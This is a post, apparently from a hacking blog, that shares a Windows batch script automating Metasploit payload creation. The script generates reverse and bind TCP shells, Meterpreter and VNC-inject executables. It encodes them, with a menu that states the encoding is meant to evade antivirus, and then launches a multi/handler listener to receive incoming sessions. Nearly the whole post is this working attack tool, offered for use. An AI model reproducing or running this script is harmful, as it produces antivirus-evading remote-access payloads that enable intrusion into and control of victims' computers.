If you have ever used fast-track or SET on backtrack you will be familiar with the automatic payload generators included within each which integrate with metasploit in order to generate payloads, encode them and then start a reverse handler. I looked around for a similar tool on windows to save time but sadly found none so I decided to make a simple batch script that does the same thing. The source is below, please feel free to post comments regarding compatibility because I haven’t tested it on many machines yet.
Note: The text on line 6 must be changed to your metasploit files directory.
Spoiler (Click to Hide)
Quote:@echo off
:housekeeping
color 0a
title Automatic payload Generator – th3slay3r – und3rgroundx
:config – edit these variables to suit your setup.
set msflocation=C:\Documents and Settings\Username\framework\msf3-mini
set msfenc=ruby msfencode
set msfpay=ruby msfpayload
set msfcli=ruby msfconsole -r temp.rc
set paydir=C:\documents and settings\T43\desktop\Payloads\
:start
cls
echo —Automatic Payload Generator—
echo made by th3slay3r == und3rgroundx
echo.
echo —Payload—
echo.
echo 1. Reverse TCP Shell
echo 2. Reverse TCP Meterpreter
echo 3. Reverse TCP VNC Inject
echo 4. Bind TCP Shell
echo 5. Bind TCP VNC Inject
echo 6. Bind Meterpreter
set /p type=Please select payload:
if %type%==1 (goto 1)
if %type%==2 (goto 2)
if %type%==3 (goto 3)
if %type%==4 (goto 4)
if %type%==5 (goto 5)
if %type%==6 (goto 6) else (echo Invalid Selection! | pause>nul | goto start)
:1
set payload=windows/shell/reverse_tcp
goto host
:2
set payload=windows/meterpreter/reverse_tcp
goto host
:3
set payload=windows/vncinject/reverse_tcp
goto host
:4
set payload=windows/shell_bind_tcp
goto host
:5
set payload=windows/vncinject/bind_tcp
goto host
:6
set payload=windows/meterpreter/bind_tcp
goto host
:host
cls
echo PAYLOAD=%payload%
set /p host=Please input host to connect back to (harverster):
echo HOST=%host%
set /p port=Please input port to connect back to:
echo PORT=%port%
cls
echo —Encoding—
echo.
echo 1. Shikata Gai Nai (Best)
echo 2. Countdown
echo 3. Unicode Mixed
echo 4. Avoid UTF8 Tolower
echo 5. Context Time
echo 6. Context Cpuid
echo 8. None at all (Will definately get fucked by AV’s)
echo.
set /p enc=Please select encoding:
if %enc%==1 (goto 1)
if %enc%==2 (goto 2)
if %enc%==3 (goto 3)
if %enc%==4 (goto 4)
if %enc%==5 (goto 5)
if %enc%==6 (goto 6)
if %enc%==7 (goto 7)
if %enc%==8 (goto 8) else (echo Invalid Selection! | pause>nul | goto encoder_select)
:1
set encoder=x86/shikata_ga_nai
goto count
:2
set encoder=x86/countdown
goto count
:3
set encoder=x86/unicode_mixed
goto count
:4
set encoder=x86/avoid_utf8_tolower
goto count
:5
set encoder=x86/context_time
goto count
:6
set encoder=x86/context_cpuid
goto count
:8
set encoder=0
goto count
:count
cls
if %encoder%==0 (goto no_enc)
echo ENCODING=%encoder%
set /p count=Input amount of times to encode payload:
cls
if %count%== (echo Invalid Selection | pause>nul | goto count)
:name_exe
set /p name=Input name for your payload:
if %name%== (echo Invalid Selection | pause>nul | goto name_exe)
:handler
set /p hand=Would you like to start a reverse handler[yes/no]:
goto make_string
:make_string
cls
echo.
echo Please wait, this may take a while…
set string1=%msfpay% %payload% LHOST=%host% LPORT=%port%
set string2=%msfenc% -e %encoder% -t exe -a x86 -e %encoder% -c %count% -o %name% -v
cd “%msflocation%”
%string1% R | %string2%
if %hand%==yes (goto start_handler) else (echo Payload generation complete, press any key to exit. & pause>nul & exit)
pause
:start_handler
cls
echo Starting Handler…
echo use multi/handler>>temp.rc
echo setg payload %payload%>>temp.rc
echo setg lhost %host%>>temp.rc
echo setg lport %port%>>temp.rc
echo setg ExitOnSession false>>temp.rc
echo exploit -j>>temp.rc
%msfcli%
pause
del temp.rc
0 Comments:
Post a Comment